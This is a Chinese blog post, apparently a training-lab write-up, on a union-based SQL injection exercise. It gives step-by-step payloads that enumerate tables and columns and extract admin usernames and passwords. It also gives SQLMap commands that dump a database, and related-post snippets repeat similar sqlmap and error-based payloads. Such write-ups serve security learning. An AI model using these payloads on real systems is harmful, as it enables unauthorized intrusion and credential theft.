SQL注入案例

已于 2023-09-19 16:20:11 修改
阅读量1.5k 收藏 7
点赞数 3
分类专栏: Web漏洞相关 文章标签: sql 数据库 安全
于 2023-09-07 16:20:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59081708/article/details/132739673
版权
本文通过实例详细描述了如何在SQL注入案例中识别注入点、确定注入类型,利用大值查询发现字段数,进而探索数据库结构并查看数据。重点介绍了SQLMap工具在注入攻击中的应用,包括查询数据库、表和获取账户信息。
摘要由CSDN通过智能技术生成

目录

一、简介

二、案例

1.发现注入点

2.寻找注入类型

3.寻找字段数

4.将传参值设为超出数据量的大值,联合查询找到回显位置

5.找到数据库

6.寻找库中的表

7.寻找表中列

8.查看表中数据

附:SQLMap注入

1.输入指令查数据库

2.输入指令查表

3.脱库查看账号密码

一、简介

记录SQL注入的案例练习

二、案例

http://pu2lh35s.ia.aqlab.cn/

1.发现注入点

2.寻找注入类型

,发现?id=1 and 1=1 符合

3.寻找字段数

发现字段数为2

4.将传参值设为超出数据量的大值,联合查询找到回显位置

5.找到数据库

6.寻找库中的表

?id=111111 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

7.寻找表中列

?id=111111 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'--+

8.查看表中数据

?id=111111 union select 1,group_concat(username,‘:’,password) from admin--+

注:用 --+ 对结尾进行注释

附:SQLMap注入(sqlmap -u "x")

1.输入指令查数据库( --dbs)

2.输入指令查表( -D xx --tables)

3.脱库查看账号密码( -D xx -T xxx -C xxxx --dump)

注:默认全yes,可以添加 --batch 指令实现全自动yes

代码熬夜敲Q
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
SQL手工注入练习:辛巴猫舍 + Sqlmap秒杀
m0_64382069的博客
11-24 662
SQL手工注入练习:辛巴猫舍 + Sqlmap秒杀:登录靶场、判断是否存在SQL注入漏洞、判断数据库字段数、判断回显点、查询相关内容、查询表、查询字段名、查询字段内容、
封神台在线靶场--尤里的复仇Ⅰ 小芳!【8题】
feiniaotjx的博客
10-20 9457
靶场练习 封神台-掌控安全在线演练靶场 第一章:为了女神小芳!
【封神台】SQL注入靶场练习(sqlmap)
00勇士王子的博客
11-01 1万+
靶场地址 https://hack.zkaq.cn 题目 解题过程 1.进入题目 2.只有个 点击查看新闻,点击进入 3.发现参数id,肯定就是我们要注入的参数了,先用sqlmap跑一遍 查询数据库 python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --dbs 因为我们需要获得管理员密码,所以要查maoshe数据库 python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --tabl
sql注入详解
热门推荐
越努力 越自由
05-05 20万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
SQL注入案例演示与防范措施大全
乱世刀疤
02-26 1万+
SQL注入攻击案例与应对措施。
SQL注入案例及原理
QYbkx974的博客
11-06 828
updatexml(1,concat(0x5e,(select username from cms_users limit 0,1),0x5e),1)//查询username表中第一个用户名。使用bp抓包查看,可以发现登录包为POST请求,而且可以看到我们刚刚输入的用户名和密码,以及请求回显为200。使用bp抓包查看,POST请求包中输入的用户名所包含的特殊字符变成了URL编码,%27为。查询cms_users表的信息,发现有两个用户,这里显示的是第一个用户。所获取的是数字类型,不是字符串类型。
SQL注入案例实验
千寻的博客
02-21 1238
文章目录前言第一章 目标第二章联合查询第一节必要条件第二节 判断字段个数第四步 判断显示位置第五步 数据库版本 当前数据库名第六步 数据库中的表第七步 表中字段第八步 字段内容第二章 报错注入第一节 group by 重复键冲突第二节XPATH 报错第三章 布尔盲注第一节 原理第二节数据库名长度第三节数据库名第四章 延时注入第一节 原理第二节获取数据库名长度第三节 数据库名免责声明 前言 搭建...
sql各种注入案例
m0_69435261的博客
09-01 5120
GTID_SUBSET( set1 , set2 ) - 若在 set1 中的 GTID,也在 set2 中,返回 true,否则返回 false ( set1 是 set2 的子集)GTID_SUBTRACT( set1 , set2 ) - 返回在 set1 中,不在 set2 中的 GTID 集合 ( set1 与 set2 的差集)GTID_SUBSET() 和 GTID_SUBTRACT() 函数,我们知道他的输入值是 GTIDset ,当输入有误时,就会报错。GTID_SUBSET函数。
SQL注入的简单案例
勇敢的兵
09-01 3867
文章目录什么是SQL注入使用数据库客户端工具查询用户表访问ERP系统(对密码输入框进行SQL注入SQL注入的原理解决方案重新注册一个管理员账号使用sys账号登录ERP系统(输入正确的密码)使用sys账号登录ERP系统(对密码输入框进行SQL注入)UserDAO类的完整代码 什么是SQL注入 SQL注入是现在普通使用的一种攻击手段,就是通过把非法的SQL命令插入到Web表单中或页面请求查询字符串中...
ASP+AXCCESS的SQL注入案例
10-28
在本案例中,我们关注的是ASP与Access数据库结合时出现的SQL注入问题。SQL注入是网络安全领域的一个常见漏洞,攻击者通过输入恶意的SQL语句来获取、修改、删除或者控制数据库中的数据。 SQL注入通常发生在网站没有...
[ 代码审计篇资源 ] SQL 注入案例源码
12-25
[ 代码审计篇资源 ] eclipse_64绿色版免安装 [ 代码审计篇 ] 代码审计案例详解中讲到的知识点最好还是自己搭建环境实践一下。...详情可以看我的文章:[ 代码审计篇 ] 代码审计案例详解(一) SQL注入代码审计案例
SpringBoot集成Mybatis实现简单的SQL注入(攻击)案例
12-14
(1)主演示就是一张t_user表,利用常见的用户登录来模拟sql注入对后台数据的侵入 (2)数据库脚本 — postgresql DROP TABLE IF EXISTS "public"."t_user"; CREATE TABLE "public"."t_user" ( "id" int8 NOT ...
九、安装artifactory并配置PostgreSQL--失败了
shafatudou的博客
09-01 1429
基于八,克隆出一个新的虚拟机,用来安装制品库并配置mysql数据库。仅参考,未使用(配置的centos自带的数据库,不会用)
详细讲解hive on tez中各个参数作用,以及如何优化sql
最新发布
cclovezbf的博客
09-05 502
最近经常有优化sql的任务,但是自己能力有限,只能凭经验去优化,现整理加学习一波,也欢迎各位学习和讨论。我们经常用hivesql 的模型就是 join.如下。这里面发生了什么,执行流程是什么,为什么有的insert要几十分钟有的只要几分钟。--造1000w条数据 文件大小为300M已知上面的数据为1000w条其中 id=1的有1000条 其余id=1000到1000w的依次分布。
SQL进阶技巧:如何利用SQL解决趣味赛马问题?| 非等值关联匹配问题
石榴姐yyds
09-05 884
这类问题的一般处理思路有两种:一种是利用先分后合的思想,先利用行转列,UNION 的方式来分别处理各自类型的数据,最终在合并汇总;一种是利用构建维度表(如本题中的马表)关联数据表的形式进行非等值匹配,这种构建维度表再关联数据表的形式在数仓开发中非常常见,两种方法都很巧妙均需要掌握。分别算出每种获奖名词类型下的每匹马的获奖次数,最终将每匹马的获奖次数相加即可。业务阶段的模型该如何建设?9)数仓团队应如何体现自己的业务价值,讲好数据故事?,可以看出只要马获奖即可,并不关心马是前三名中的哪一个名次。
Python知识点:如何使用SQLAlchemy进行ORM(对象关系映射)
码农超哥的博客
08-31 826
定义数据库表的ORM模型。每个模型类都需要继承自Base,并且通常以类的属性形式定义表的列。
PostgreSQL技术内幕6:PostgreSQL索引技术
qq_40529346的博客
09-01 2288
本文主要介绍PG的索引技术,包含PG支持的索引类型,语法,查看方式,以及其中B-Tree索引的原理解析和源码解读。
MP条件构造器之常用功能详解(select、set)
2301_80093566的博客
08-31 948
方法是 MyBatis-Plus 中用于构建更新操作的高级方法之一,它用于设置更新语句中的 SET 字段。方法是 MyBatis-Plus 中用于构建查询条件的高级方法之一,它用于设置查询的字段。现在,我们希望根据动态条件来决定是否更新某些字段。方法,可以指定在查询结果中包含哪些字段,从而实现字段级别的查询定制。如果字段名称在数据库和对象模型中不同,我们可以使用映射名称进行更新。现在,我们希望根据特定的条件来选择字段,并且排除主键字段。假设我们希望查询字段,但排除主键字段。,生成的 SQL 语句如下:**
java sql注入案例
06-13
下面是一个简单的Java SQL注入案例: 假设有一个使用JDBC连接数据库的Java程序,其中一个查询用户信息的方法如下: ``` public User getUser(String username, String password) throws SQLException { String ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

代码熬夜敲Q

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值